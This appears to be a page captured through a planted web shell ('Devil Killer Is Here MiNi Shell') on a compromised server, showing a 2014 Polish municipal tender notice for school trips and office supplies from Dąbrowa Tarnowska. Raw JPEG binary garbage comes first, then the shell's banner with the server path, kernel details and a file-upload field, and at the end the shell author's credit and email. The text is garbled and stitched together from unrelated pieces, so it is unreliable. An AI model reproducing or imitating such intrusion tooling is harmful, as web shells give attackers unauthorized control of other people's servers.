JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140508/155514-N-2014.html

<p class="kh_header"><b>Dąbrowa Tarnowska: Pakiet 1 Zakup usług edukacyjnych w formie wyjazdowej i stacjonarnej w ramach projektu POKL Równaj w górę
Pakiet 2 Doposażenie bazy administracyjnej, obsługującej projekt w materiały biurowe w ramach projektu POKL Równaj w górę</b><br>
<b>Numer ogłoszenia: 155514 - 2014; data zamieszczenia: 08.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Tarnowska , Rynek 34, 33-200 Dąbrowa Tarnowska, woj. małopolskie, tel. 14 6422775, faks 14 6422747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dabrowatar.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pakiet 1 Zakup usług edukacyjnych w formie wyjazdowej i stacjonarnej w ramach projektu POKL Równaj w górę
Pakiet 2 Doposażenie bazy administracyjnej, obsługującej projekt w materiały biurowe w ramach projektu POKL Równaj w górę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu przez nauczycieli zajęć pozalekcyjnych i dydaktyczno-wyrównawczych dla uczniów Publicznej Szkoły Podstawowej im. Kardynała Stefana Wyszyńskiego w Gruszowie Wielkim (w skrócie PSP GW) i Publicznej Szkoły Podstawowej im bł. Ks. Jerzego Popiełuszki w Nieczajnie Górnej (w skrócie PSP NG) Zamawiający nie dopuszcza składanie ofert częściowych. Każdy wykonawca może złożyć jedną ofertę na 1 pakiet.
Rodzaj zamówienia: usługa
Pakiet 1.
Wycieczka Toruń-Malbork-Gdańsk Lipiec 2014 (3 dni) /Zadanie 1-zajęcia rozwijające w szkołach/
Wycieczka Warszawa Lipiec 2014 (2 dni) /Zadanie 1-zajęcia rozwijające w szkołach/
Wycieczka Warszawa Lipiec 2014 (3 dni)/Zadanie 2 - zajęcia wyrównujące braki edukacyjne w szkołach/ 
Wycieczka Osada Słowiańska Stobierna X 2014 (1 dzień) /Zadanie 1-zajęcia rozwijające w szkołach/
Noc obserwacyjna i seans astronomiczny Niepołomice III 2015 (1 dzień) /Zadanie 1-zajęcia rozwijające w szkołach/
Jaskinia Raj i Zamek w Chęcinach IV 2015 (1 dzień) /Zadanie 1-zajęcia rozwijające w szkołach/
Inscenizacja Żniwa - czerwiec 2014/Zadanie 1-zajęcia rozwijające w szkołach/
Inscenizacja Wigilia - Grudzień 2014 /Zadanie 1-zajęcia rozwijające w szkołach/
Twórcy ludowi 2014-2015/Zadanie 1-zajęcia rozwijające w szkołach/
Kwartalny kurs pływania cz.1 i cz.2 Cz. 1 IV-VI 2014 Cz. 2 III-V 2015/Zadanie 3 - zajęcia korekcyjne w szkołach GWi NG/
Wycieczka zawodoznawcza do firmy (pracodawcy) i Punktu Pośrednictwa Pracy OHP w Dąbrowie Tarnowskiej  VI 2014/Zadanie 5-Kim chcę zostać w życiu-program innowacyjny/
Warsztaty w  Muzeum etnograficznym- 6 spotkań tematycznych VI-VI - 2014 i III-V 2015/Zadanie 1-zajęcia rozwijające w szkołach/
Warsztaty florystyczne V 2014/Zadanie 1-zajęcia rozwijające w szkołach/
Konkurs plastyczny Ja i moja przyszłość VI 2014/Zadanie 5-Kim chcę zostać w życiu-program innowacyjny/
Terminy zajęć i warsztatów ustala koordynator projektu w porozumieniu z dyrektorem szkoły.
Wymagany termin realizacji:
Rozpoczęcie: od podpisania umowy poprzetargowej,
Zakończenie: do dnia 30 czerwca 2015 r.

Pakiet 2.
1.	Papier ksero A4 gramatura papieru 80g/m2 50 ryz po 500kartek
2.	Papier ksero A3 gramatura papieru 80g/m2 10 ryz po 500kartek
3.	Tusz do drukarki HP officejet g85 czarny z dystrybucji autoryzowanego partnera nie gorszy niż HP nr 45 (51645AE) 42ml okres przydatności nie krótszy niż do końca 2015roku -3sztuki
4.	Tusz do drukarki HP officejet g85 kolorowy z dystrybucji autoryzowanego partnera nie gorszy niż HP nr 78 (C6578AE) 38 ml okres przydatności nie krótszy niż do końca 2015roku-2sztuki
5.	Tusz do drukarki HP 845c czarny z dystrybucji autoryzowanego partnera nie gorszy niż HP nr 15 (C6615DE) 25 ml okres przydatności nie krótszy niż do końca 2015roku -2sztuki
6.	Toner do ksera  kompatybilny Olivetti d-Copia 16/200/16MF/1600/2000 wydajność 15000 kopii  nie gorszy niż toner Olivetti d-copia 16/200/16MF/1600/2000 - B0446  -2 sztuki
7.	Toner do ksera  kompatybilny z tonerem Kyocera tk-435 wydajność 15000 kopii  nie gorszy niż toner Kyocera tk-435  -2 sztuki
8.	Toner do ksera  Kyocera km1620 kompatybilny z tonerem Kyocera tk-410 wydajność 15000 kopii  nie gorszy niż toner Kyocera tk-410  -2sztuki
9.	Toner do drukarki HP LaserJetP1606dn z dystrybucji autoryzowanego partnera HP  nie gorszy niż HP 78A CE278A-2sztuki
10.	Toner do drukarki HP 4650dtn z dystrybucji autoryzowanego partnera HP  nie gorszy niż HP c9720a-1sztuka
11.	Toner do drukarki HP 4650dtn z dystrybucji autoryzowanego partnera HP  nie gorszy niż HP c9721a-1sztuka
12.	Toner do drukarki HP 4650dtn z dystrybucji autoryzowanego partnera HP  nie gorszy niż HP c9722a-1sztuka
13.	Toner do drukarki HP 4650dtn z dystrybucji autoryzowanego partnera HP  nie gorszy niż HP c9723a-1sztuka
14.	Toner do drukarki ML-2850dn z dystrybucji autoryzowanego partnera Samsung  nie gorszy niż SAMSUNG ml-2850b-2sztuki
15.	Toner do drukarki ML-2571n z dystrybucji autoryzowanego partnera Samsung  nie gorszy niż SAMSUNG ml-2010d3-2sztuki
16.	Segregator A4 szerokość 80mm różne kolory- 10 sztuk
17.	Segregator A4 szerokość 75mm różne kolory -10 sztuk
18.	Segregator A4 szerokość 40mm różne kolory -20 sztuk
19.	Skoroszyt foliowy plastikowy różne kolory -40 sztuk
20.	Długopisy żelowe niebieskie- 50sztuk 
21.	Markery kolory niebieski, czerwony, czarny, zielony grubości, niezmywalne permanentne końcówki okrągłe- 100 sztuk
22.	Koperta rozmiar C6- 200 sztuk 
23.	Koperta rozmiar A4 brązowa rozszerzana samoklejące z paskiem- gramatura 150 g/m2- wymiary: 280*400*40 mm -100sztuk 
24.	Koszulki foliowe A4- 1000sztuk
25.	Skoroszyt foliowy plastikowy różne kolory -40 sztuk
26.	Grzbiety do bindowania 6mm-100 sztuk 
27.	Grzbiety do bindowania 8mm-100 sztuk
28.	Grzbiety do bindowania 10mm-100 sztuk
29.	Grzbiety do bindowania 12mm-100 sztuk
30.	Okładki do bindowania przeźroczyste A4 150mic -500 sztuk
31.	Okładki do bindowania kolorowe A4 gramatura 150g/m2-500 sztuk
32.	Zszywacz biurowy do 100 kartek -2 sztuki
33.	Zszywacz biurowy do 250 kartek -2 sztuki
34.	Zszywki do zszywacza biurowego 20 opakowań po 1000 sztuk
35.	PUDŁA ARCHIWIZACYJNE - A4 - szerokość 11 cm wymiary: 35 x 26,5 x 11 cm z tektury falistej - 50 sztuk
36.	Spinacze biurowe -1000 sztuk.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępujący do przetargu Wykonawca jest zobowiązany wnieść wadium w wysokości: 2000,00 zł, (słownie: dwa tysiące złotych, 00/100 groszy) dla każdego z pakietów.
Wadium musi być wniesione przed upływem terminu składania ofert tj. do dnia 19.05.2014 r., godz. 10:00.
Wadium może być wniesione w jednej lub kilku wymienionych poniżej formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych, 
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami).
Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek	 bankowy Urzędu Miejskiego w Dąbrowie Tarnowskiej w Banku Spółdzielczym w Dąbrowie Tarnowskiej, Nr 72 9462 0003 2001 0000 4226 0003 z dopiskiem wpłata wadium - sprawa nr IZP.271.17.2014.
Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami), Wykonawca winien złożyć w formie oryginału w Urzędzie Miejskim w Dąbrowie Tarnowskiej	(33-200 Dąbrowa Tarnowska, Rynek 34) lub załączyć w formie oryginału do oferty; w takim przypadku oferta musi zawierać także kopię tych dokumentów zgodnie z wymaganiami pkt IV.4.4 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty oświadczenia Wykonawcy, że spełnia warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca załączy do oferty podpisane oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty oświadczenia Wykonawcy, że spełnia warunki dotyczące posiadania wiedzy i doświadczenia. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca załączy do oferty podpisane oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty oświadczenia Wykonawcy, że spełnia warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz wykaz osób zdolnych do wykonania zamówienia. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca załączy do oferty podpisane oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty wykazu osób zdolnych do wykonania zamówienia zgodnie z SIWZ. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca załączy do oferty podpisane oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty oświadczenia Wykonawcy, że spełnia warunki dotyczące sytuacji ekonomicznej i finansowej oraz przedstawi opłaconą polisę ubezpieczenia OC.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dabrowatar.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Tarnowskiej, Rynek 34, 33-200 Dąbrowa Tarnowska, pokój nr. 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2014 godzina 10:00, miejsce: Urząd Miejski w Dąbrowie Tarnowskiej, Rynek 34, 33-200 Dąbrowa Tarnowska, pokój nr. 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Tak, w ramach EFS..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup usług edukacyjnych w formie wyjazdowej i stacjonarnej w ramach projektu POKL Równaj w górę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dopsażenie bazy administracyjnej, obsługującej projekt w materiały biurowe w ramach projektu POKL Równaj w górę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com